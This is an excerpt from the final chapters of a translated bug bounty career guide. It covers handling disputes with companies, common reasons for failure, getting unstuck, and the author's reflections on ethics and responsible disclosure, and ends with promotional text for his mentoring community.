6. Seek Mediation if Necessary:
If you are unable to resolve the conflict directly with the
other party, consider seeking mediation from a neutral third party,
such as Bug Bounty's platform support team or an independent
mediator. A mediator can help facilitate communication, clear up
misunderstandings and find solutions that satisfy both parties.
Common Conflict Scenarios and How to Address Them:
- Disagreement on the Severity of a Vulnerability: If you
disagree with the company's assessment of the severity of a vul-
nerability, provide additional evidence and strong arguments to
support your point of view. If necessary, request a second opi-
nion from another researcher or the platform's support team.
- Reward Payment Delays: If the company is late in paying
your reward, communicate with them in a professional and res-
pectful manner to remind them of the outstanding payment. If
the problem persists, you can request help from the platform's
support team.
- Communication Problems: If you are having difficulty com-
municating with the company or feel they are not listening to
you, try changing your approach or communication channel. If
the problem persists, seek mediation from a third party.
- Conflicts with Other Researchers: If you have a conflict
with another researcher, try to resolve it directly with them pri-
vately. If this is not possible, seek mediation from the platform
support team.
Additional Tips:
- Document everything: Keep a record of all communica-
tions and actions related to the conflict. This can be useful if you
need to present evidence or escalate the issue.
- Learn from your experiences: Every conflict is a learning
opportunity. Reflect on what went well and what you could
have done differently to improve your conflict resolution skills.
- Maintain a Positive Attitude: Even in difficult situations,
maintain a positive and constructive attitude. This will help
162 MILLIONAIRE RECORDS
you maintain professional relationships and find more effec-
tive solutions.
Conflict is an inevitable part of any human interaction,
even in the world of Bug Bounty. By learning to manage conflict
effectively, you will be able to build stronger relationships with
companies, solve problems efficiently, and contribute to a more
positive and collaborative Bug Bounty environment.
4 .10 – W H Y YOU AR E
F AILIN G? # 4 .10
Failure is an inevitable part of the learning and growth
process. All researchers, even the most experienced, face times
when they fail to find vulnerabilities or their reports are rejected.
This chapter will explore the common reasons why researchers
fail in Bug Bounty programs and provide you with strategies to
overcome these challenges and improve your results.
1. Lack of Knowledge and Skills:
- One of the most common reasons for failure in Bug Bounty
is lack of technical knowledge and skills. Cybersecurity is a cons-
tantly evolving field, and it is crucial to stay up-to-date on the
latest trends, techniques and tools.
- Solution: Invest time in learning and improving your skills.
Participate in online courses, read blogs and specialized books,
attend conferences and workshops, and practice your skills on
ethical hacking platforms such as Hack The Box, TryHackMe and
PortSwigger Web Security Academy.
2. Lack of Focus and Strategy:
Many researchers jump into Bug Bounty programs without a
clear strategy, jumping from program to program without a defi-
ned focus. This can lead to dispersion of effort and lack of results.
- Solution: Define your objectives and priorities. Choose
programs that align with your skills and interests, and develop a
vulnerability hunting strategy that is tailored to each program.
3. Lack of Persistence and Patience:
 Finding vulnerabilities can be a long and tedious process.
Many researchers get discouraged after a few unsuccessful
attempts and abandon the program.
- Solution: Be persistent and patient. Don't give up easily
and keep looking for vulnerabilities even if you don't find any-
thing right away. Remember that every failed attempt is a lear-
ning opportunity.
4. Lack of Communication and Collaboration:
Effective communication with the company and collabora-
tion with other researchers are key to success in Bug Bounty. If
you do not communicate clearly and professionally, or if you are
unwilling to collaborate, your reports may be rejected or ignored.
- Solution: Improve your communication skills and collabo-
rate with other researchers. Make sure your reports are clear,
concise and contain all the information necessary for the com-
pany to reproduce and fix the vulnerability.
5. Not Reading the Program Rules:
Each Bug Bounty program has its own rules and scope. If
you don't read the rules carefully, you may report vulnerabilities
that are outside the scope of the program or use impermissible
testing techniques, which can lead to rejection of your reports.
- Solution: Read the program rules carefully before you
start looking for vulnerabilities. Make sure you understand what
assets are included in the scope, what types of vulnerabilities are
eligible for rewards, and what testing techniques are allowed.
6. Focus on Low Severity Vulnerabilities:
Many researchers focus on finding a large number of low-
-severity vulnerabilities, rather than looking for critical vulnera-
bilities that may have a greater impact. This can lead to lower
rewards and less personal satisfaction.
- Solution: Prioritize quality over quantity. Focus on finding
high-severity vulnerabilities that can have a significant impact
on the company's security.
7. Failure to Learn from Mistakes:
Every rejected report is a learning opportunity. If you don't
analyze your mistakes and learn from them, you are likely to keep
making the same mistakes in the future.
- Solution: Analyze your rejected reports and learn from your
mistakes. Ask for feedback from the company and other investi-
gators, and use that information to improve your future reports.
Failure is a natural part of the learning process at Bug Bounty.
By understanding the common reasons for failure and applying
the right strategies, you can overcome challenges, improve your
skills, and increase your chances of success in this exciting field.
4 .11 – W H AT T O DO
W H EN YOU AR E ST U C K
#4 .11
It's common to encounter moments when you feel stuck.
You may have spent hours searching for vulnerabilities without
success, or you may come across a technical obstacle that you
don't know how to overcome. This chapter will provide you with
practical strategies and tips for overcoming those stuck moments
and moving forward on your journey as a security researcher.
1. Recognize that you are stuck:
The first step to overcoming a roadblock is to recognize that
you are stuck. Don't get frustrated or give up. Instead, accept
that this is a normal part of the process and that all investigators
face this challenge at some point.
2. Take a Break:
Sometimes, the best solution is to step away from the
problem for a while. Take a break, go for a walk, exercise or do
some activity that helps you clear your mind. When you return
to the problem, you may have a new perspective or a fresh idea.
3. Change your Focus:
If you have been focusing on a specific type of vulnerabi-
lity or a particular testing technique, try changing your focus.
Explore other areas of the system or try different tools and
let ' s get to work 163
techniques. Sometimes, a change of perspective may be all you
need to find a vulnerability.
4. Ask for Help:
Don't be afraid to ask other researchers for help. Join online
communities such as forums or Discord groups where you can
ask questions, share your experiences and learn from others. You
can also look for mentors or Bug Bounty partners with whom
you can collaborate and share ideas.
Getting stuck is a normal part of the Bug Bounty process.
By applying the strategies and tips presented in this chapter, you
will be able to overcome roadblocks, learn from your mistakes,
and keep moving forward on your path as a successful security
researcher. Remember, the key is to maintain a positive attitude,
be persistent and never stop learning.

5. Learn from your Mistakes:

Every time you get stuck, it's a learning opportunity. Analyze

what went wrong and what you could have done differently.
Learn from your mistakes and use that knowledge to improve
your future vulnerability searches.

6. Break the Problem into Smaller Parts:

If you are faced with a complex problem, break it down into

smaller, more manageable parts. This will help you approach the
problem more systematically and avoid feeling overwhelmed.

7. Research and Learn:

Sometimes, you get stuck because you lack knowledge or

skills in a specific area. Spend time researching and learning about
that area. Read books, blogs, articles and technical documenta-
tion, and practice your skills in testing environments.

8. Don't Give Up:

Persistence is key in the Bug Bounty world. Don't give up

easily, even if you face obstacles or failures. Keep learning, impro-
ving your skills and looking for new opportunities.

Additional Tips:

- Keep a Positive Attitude: A positive attitude can make all

the difference when you face challenges. Stay motivated and
confident, even when the going gets tough.
- Celebrate Your Achievements: Recognize and celebrate
your successes, no matter how small. This will help you stay
motivated and keep moving forward.
- Don't Compare Yourself to Others: Every researcher has
his or her own pace of learning and progress. Don't compare
yourself to others and focus on your own development.

164 MILLIONAIRE RECORDS

let ' s get to work 165
 A Word from Santiago's Experience:
Lessons Learned from a Decade of Bug Bounty
After almost a decade immersed in the exciting world of
Bug Bounty, I have accumulated a number of experiences, lear-
nings and reflections that I would like to share in this chapter. I
hope these words will serve as inspiration and guidance for those
who are just starting their journey in this field or for those who
are looking to improve their skills and results.
1. Passion:
My adventure into the world of Bug Bounty began as a
hobby, a passion that drove me to explore the depths of compu-
ter security. I found the thrill of finding a vulnerability and con-
tributing to a more secure digital environment to be incredibly
rewarding. This passion has been the driving force that has kept
me going over the years, even during the most challenging times.
2. Constant Learning:
Cybersecurity is a constantly evolving field. Technologies
change, threats become more sophisticated, and attack and
defense techniques continually adapt. To stay relevant and com-
petitive, I have had to invest time and effort in constantly learning.
I have attended conferences, read books and blogs, participated
in online courses, and collaborated with other researchers. The
learning never ends in this field, and that is one of the things I
am most passionate about.
3. The Importance of Community:
The Bug Bounty community is an invaluable resource. I
have learned a lot from other researchers, sharing knowledge,
experiences and advice. Collaboration and mutual support are
critical to growth and success in this field. Participating in online
forums, chat groups, and community events has allowed me to
make valuable connections and learn from the best.
4. The Hacker Mentality:
The hacker mindset is a way of thinking that goes beyond
simply looking for vulnerabilities. It's about questioning every-
thing, looking for creative solutions and thinking outside the
box. This mindset has allowed me to find vulnerabilities that
others overlooked and develop innovative solutions to com-
plex problems.
166 MILLIONAIRE RECORDS
5. Ethics and Responsibility:
Ethics and accountability are fundamental pillars in the Bug
Bounty world. As security researchers, we have a responsibility to
report vulnerabilities responsibly, protecting users and avoiding
causing unnecessary harm. Responsible disclosure is essential
to maintain trust between researchers and companies, and to
ensure that vulnerabilities are properly addressed.
6. The Balance between Passion and Profession:
As my career at Bug Bounty took off, I had to find a balance
between my passion for security and the demands of a profes-
sional career. This involved setting schedules, defining clear
goals, and learning how to manage my time effectively. I also
had to learn to deal with the stress and pressure that comes with
working in such a demanding field.
7. Positive Impact:
One of the greatest satisfactions of my career has been
seeing the positive impact my findings have had on the security
of companies and their users. Knowing that I have contributed
to protecting people from cyber threats motivates me to keep
going and strive to improve every day.
8. The Future of Bug Bounty:
The future of Bug Bounty is bright. As technology advances
and cyber threats become more sophisticated, the demand for
talented security researchers will continue to grow. Bug Bounty
programs are expanding into new areas, such as supply chain
security, cloud security and IoT device security. Bounties are
increasing and companies are investing more in security programs.
My experience in the Bug Bounty world has been an incre-
dible journey full of challenges, learnings and satisfactions. I have
had the opportunity to work on exciting projects, meet ama-
zing people and make a real difference in the world. If you are
considering a career at Bug Bounty, I encourage you to follow
your passion, constantly learn, connect with the community and
never lose sight of the importance of ethics and accountability.
let ' s get to work 167
CO NCL
US ION
 T R A NS FORM YOU R
P AS S I O N IN T O B OU N-
TIES

180 MILLIONAIRE RECORDS

 Throughout these pages, we have explored together the
exciting world of Bug Bounty, from its technical basics to the
most advanced strategies for finding and reporting vulnerabilities. With gratitude and admiration,
We have shared experiences, tips and insights that I hope have
been useful to you in your own journey as a security researcher. Santiago Lopez

Now, as we come to the end of this book, I want to share

some final words from my heart, as a friend and partner in this
exciting adventure.

First, I want to express my sincere thanks to you, dear rea-

der, for joining me on this journey. Your interest and dedication
to cybersecurity are inspiring, and I am honored to have been
able to share my knowledge and experiences with you.

Throughout my career, I have learned that success in Bug

Bounty is not just about technical skills, but also about passion,
perseverance, and a constant growth mindset. I have learned that
collaboration and mutual support are critical to the progress of
the community, and that ethics and accountability are essential
pillars to building a safer digital environment.

I have been fortunate to experience firsthand the positive

impact Bug Bounty can have on the security of companies and
their users. Every vulnerability I've discovered and reported has
been a small victory in the fight against cyber threats, and that
fills me with pride and satisfaction.

But the most important thing I've learned is that Bug Bounty
is much more than a career or a way to make money. It's a pas-
sion, a community and an opportunity to make a difference in
the world. It is a way to use our skills and knowledge to protect
people and businesses from the dangers of cyberspace.

My wish for you, dear reader, is that you find the same
passion and satisfaction in Bug Bounty that I have found. May
you be inspired to constantly learn and grow, to collaborate
with other researchers, and to use your skills to make the digi-
tal world a safer place.

And who knows, maybe you will be the next Santiago Lopez,
the next millionaire hacker to make Bug Bounty history. The
future is in your hands!

Thank you for reading my book and for being part of this
amazing community - I wish you every success in your journey
as a security researcher! Traduccion: Santiago Lopez, Tomas Lopez

let ' s get to work 181

 MILLIONAIRE RECORDS

As founder of the $1 Million Dollar Club,

Santiago generously shares his experience,
knowledge, and strategies with an exclusive
community of security experts and entrepre-
neurs, offering unique courses, personalized
mentoring, and an invaluable network.

"MY BIGGEST DREAM RIGHT NOW IS

TO CREATE NEW MILLIONAIRES AND
CHANGE PEOPLE'S LIVES"